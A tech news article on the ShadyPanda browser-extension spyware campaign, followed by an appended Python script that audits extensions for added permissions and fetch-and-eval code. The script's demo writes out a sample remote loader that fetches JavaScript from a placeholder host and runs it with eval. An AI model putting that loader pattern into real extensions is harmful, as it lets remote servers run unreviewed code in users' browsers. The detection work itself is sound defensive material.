Spyware infects 4 million users after popular browser extensions go rogue

Ali Wadi Hasan

Cybersecurity researchers have uncovered a highly advanced malware operation that infected millions of computers via browser extensions hosted on the Chrome Web Store and the Microsoft Edge add-ons site. These extensions initially appeared as legitimate apps but were altered with malicious code during their updates last year.

Researchers from cybersecurity firm Koi report that a China-based hacking group known as ShadyPanda is actively running at least two separate malware campaigns by embedding malicious code into browser extensions.

The first campaign includes at least five extensions that operated normally for about five years before being compromised. One example is Clean Master, a cache-cleaning tool with over 200,000 users that previously had both the Featured and Verified badges on the Chrome Web Store. Google has since removed it.

The second campaign features five more extensions, including WeTab, a tab management tool with over 3 million users. Together, these extensions are used by more than four million people worldwide. Unlike Clean Master and the other compromised extensions from the first campaign, all five from this second group are still available on the Microsoft Edge Add-ons site.

According to the researchers, malicious code was inserted into these extensions in 2024, effectively transforming them into spyware that secretly collected users’ browsing data. The gathered information was sent in real time to external servers located in China.

The researchers explained that the compromised extensions collectively acted as a remote code execution system, enabling attackers to automatically download and run JavaScript inside the browser without any user approval. They estimate that more than 4.3 million devices have been infected.

ShadyPanda’s first documented attack occurred in 2023, although the group is thought to have been active since at least 2018. Its earliest major operation involved affiliate fraud: malicious apps injected affiliate-tracking links into users’ shopping clicks, which also gave the group data on their purchasing habits.

The group later increased its reach by pushing malicious updates to extensions that were already installed and trusted, which helped it avoid detection. According to the researchers, ShadyPanda was able to distribute the malware with relative ease because Google does not review updates to existing extensions as thoroughly as it evaluates newly submitted ones.
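The two weak points the article describes, an update that quietly widens an extension's permissions and a loader that fetches JavaScript from a server and executes it, are both visible in an unpacked extension's files. The following audit script is an added example written for this page, not code from Koi or from any of the extensions named above; the two sample extensions it builds (names, manifests, scripts and the `update.example.invalid` URL) are constructed for the demo. It diffs an updated manifest against the previous version's permissions and flags any script that combines a network fetch with dynamic code execution, the pattern behind a "remote code execution system" in the browser.

```python
"""Audit unpacked browser extensions for signs of a malicious update:
broad or newly added permissions, and "fetch remote data, then execute it"
patterns in the bundled scripts. The sample extensions built in demo() are
constructed for this example and are not the extensions from the article."""
import json
import re
import tempfile
from pathlib import Path
from typing import Optional

# Permissions that let an extension observe or modify every page the user visits.
HIGH_RISK_PERMISSIONS = {
    "<all_urls>", "tabs", "webRequest", "webRequestBlocking",
    "scripting", "cookies", "history", "webNavigation",
}

# A network fetch plus dynamic code execution in the same file is the signature
# of a remote loader: the server, not the store-reviewed package, decides what
# code runs in the browser.
REMOTE_FETCH_RE = re.compile(r"\b(fetch|XMLHttpRequest|importScripts)\s*\(")
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(")


def load_manifest(ext_dir: Path) -> dict:
    return json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))


def permissions_of(manifest: dict) -> set:
    # Manifest V2 lists host patterns under "permissions"; V3 moves them to "host_permissions".
    return set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))


def added_permissions(old_manifest: dict, new_manifest: dict) -> list:
    """Permissions present in the new version but absent from the old one."""
    return sorted(permissions_of(new_manifest) - permissions_of(old_manifest))


def audit_extension(ext_dir: Path, previous_manifest: Optional[dict] = None) -> dict:
    """Return the extension's name/version and a list of human-readable findings."""
    manifest = load_manifest(ext_dir)
    findings = []
    risky = sorted(permissions_of(manifest) & HIGH_RISK_PERMISSIONS)
    if risky:
        findings.append("broad permissions: " + ", ".join(risky))
    if previous_manifest is not None:
        new_perms = added_permissions(previous_manifest, manifest)
        if new_perms:
            findings.append("update added permissions: " + ", ".join(new_perms))
    for js in sorted(ext_dir.rglob("*.js")):
        src = js.read_text(encoding="utf-8", errors="replace")
        if REMOTE_FETCH_RE.search(src) and DYNAMIC_EXEC_RE.search(src):
            rel = js.relative_to(ext_dir).as_posix()
            findings.append(f"{rel}: fetches remote data and executes code dynamically")
    return {"name": manifest.get("name", "?"),
            "version": manifest.get("version", "?"),
            "findings": findings}


def _write_extension(root: Path, name: str, manifest: dict, scripts: dict) -> Path:
    """Write a minimal unpacked extension (constructed sample) to disk."""
    ext_dir = root / name
    ext_dir.mkdir(parents=True)
    (ext_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    for filename, body in scripts.items():
        (ext_dir / filename).write_text(body, encoding="utf-8")
    return ext_dir


def demo() -> dict:
    """Audit a benign extension and a constructed 'updated' version of it."""
    old_manifest = {"name": "Cache Tidy", "version": "1.0", "manifest_version": 2,
                    "permissions": ["storage"]}
    new_manifest = {"name": "Cache Tidy", "version": "1.1", "manifest_version": 2,
                    "permissions": ["storage", "tabs", "<all_urls>"]}
    benign_js = "chrome.storage.local.get('opts', o => console.log(o));\n"
    loader_js = (
        "fetch('https://update.example.invalid/payload.js')\n"  # constructed URL
        "  .then(r => r.text())\n"
        "  .then(code => eval(code));\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        clean = _write_extension(root, "clean", old_manifest, {"background.js": benign_js})
        updated = _write_extension(root, "updated", new_manifest, {"background.js": loader_js})
        return {"clean": audit_extension(clean),
                "updated": audit_extension(updated, old_manifest)}


if __name__ == "__main__":
    for label, report in demo().items():
        print(label, report)
```

Run it against a real extension by pointing `audit_extension` at the unpacked extension directory from the browser's profile and, for the update check, at a saved copy of the previous `manifest.json`. A clean extension that suddenly reports new host permissions and a fetch-and-eval script is exactly the kind of change store review is least likely to have caught.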

MENA TECH – The leading Arabic-language media platform for technology and business
Copyright © 2025 MenaTech. All rights reserved.